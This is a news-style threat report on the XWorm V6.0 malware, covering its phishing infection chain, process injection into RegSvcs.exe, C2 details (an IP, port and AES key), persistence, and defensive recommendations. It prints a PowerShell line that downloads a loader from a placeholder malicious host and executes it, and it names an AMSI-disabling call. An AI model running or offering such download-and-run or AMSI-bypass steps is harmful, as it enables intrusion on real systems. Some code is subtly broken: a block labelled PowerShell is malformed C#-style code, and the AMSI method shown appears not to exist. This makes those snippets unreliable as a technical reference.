Emergence of XWorm V6: Advanced Malware Injects Malicious Code into Legitimate Windows Processes

In mid-2025, the cybersecurity landscape witnessed the resurgence of XWorm, a sophisticated malware that had previously faded from prominence. This revival was marked by the release of XWorm V6.0 on June 4, 2025, following the abrupt discontinuation of official support for version 5.6 in late 2024. The announcement, made by an account named XCoderTools on hackforums.net, claimed to address a critical remote code execution vulnerability present in earlier versions.

Despite initial skepticism regarding the authenticity of the author, subsequent samples submitted to VirusTotal confirmed the rapid adoption of XWorm V6.0 among cybercriminals. This new variant introduced advanced features, including the ability to inject malicious code into legitimate Windows processes, thereby enhancing its stealth and persistence.

Modular Architecture and Infection Chain

XWorm’s design is inherently modular, comprising a core client and a suite of plugins that facilitate a range of malicious activities, from credential theft to ransomware deployment. The infection process is meticulously crafted to evade detection and maintain a foothold on compromised systems.

The initial infection vector typically involves a JavaScript (.js) file delivered through phishing emails or compromised websites. Upon execution, this script initiates a PowerShell command to download and execute a secondary payload:

“`powershell
$payload = (New-Object System.Net.WebClient).DownloadString(‘http://malicious.site/loader.ps1’)
Invoke-Expression $payload
“`

This PowerShell script performs several critical actions:

1. Disabling Security Measures: It calls `[System.Management.Automation.AmsiUtils]::ToggleAmsi(false)` to disable the Antimalware Scan Interface (AMSI), thereby preventing the detection of subsequent malicious activities.

2. Deploying Malicious Components: The script writes an injector DLL and the primary XWorm client executable to the system’s temporary directory (`%TEMP%`).

3. Executing the Injector: Utilizing the `rundll32.exe` process, the injector DLL is executed with the following command:

“`powershell
Process injector = new Process();
injector.StartInfo.FileName = rundll32.exe;
injector.StartInfo.Arguments = \%TEMP%\\injector.dll\,#1 \%TEMP%\\XWormClient.exe\;
injector.Start();
“`

By leveraging `rundll32.exe`, the injector maps the malicious code into the address space of `RegSvcs.exe`, a legitimate Windows process. This technique allows the malware to operate under the guise of a trusted system binary, effectively concealing its presence and complicating detection efforts.

Command and Control Communication

Once established on the host system, XWorm V6.0 initiates communication with a command-and-control (C2) server located at 94.159.113.64 over port 4411. This communication channel is secured using AES encryption with a default key of 666666, ensuring that data exchanged between the infected system and the C2 server remains confidential.

To uniquely identify each compromised machine, the malware generates a Client ID by hashing a combination of system parameters, including the username, operating system version, processor count, and directory sizes. This Client ID is stored in the Windows registry under the `HKCU` hive and is utilized for all subsequent plugin storage, encryption routines, and C2 transactions.

Advanced Evasion and Persistence Mechanisms

XWorm V6.0 employs several sophisticated techniques to evade detection and maintain persistence:

– Memory-Only Execution: The malware operates primarily in memory, reducing its footprint on the disk and making it more challenging for traditional antivirus solutions to detect.

– Process Injection: By injecting malicious code into legitimate processes like `RegSvcs.exe`, XWorm V6.0 effectively hides its activities within trusted system binaries.

– Registry Manipulation: The malware modifies registry run keys to ensure automatic execution upon system startup, thereby maintaining persistence across reboots.

– Plugin Management: Additional malicious functionalities are delivered as Base64-encoded DLLs. Each plugin’s SHA-256 hash is checked against the registry; if absent, the plugin is fetched and loaded directly into memory, negating the need for disk writes and further complicating detection efforts.

Implications and Recommendations

The emergence of XWorm V6.0 underscores the evolving sophistication of malware threats and the continuous efforts by cybercriminals to develop more effective evasion techniques. Organizations and individuals are advised to implement comprehensive cybersecurity measures, including:

– User Education: Training users to recognize phishing attempts and avoid executing unknown scripts or downloading files from untrusted sources.

– Endpoint Protection: Deploying advanced endpoint detection and response (EDR) solutions capable of identifying and mitigating memory-based attacks and process injection techniques.

– Regular Updates: Ensuring that all systems and software are up-to-date with the latest security patches to mitigate vulnerabilities that malware like XWorm V6.0 may exploit.

– Network Monitoring: Implementing robust network monitoring to detect unusual outbound connections, which may indicate communication with C2 servers.

By adopting a multi-layered security approach and staying informed about emerging threats, organizations can enhance their resilience against sophisticated malware campaigns such as XWorm V6.0.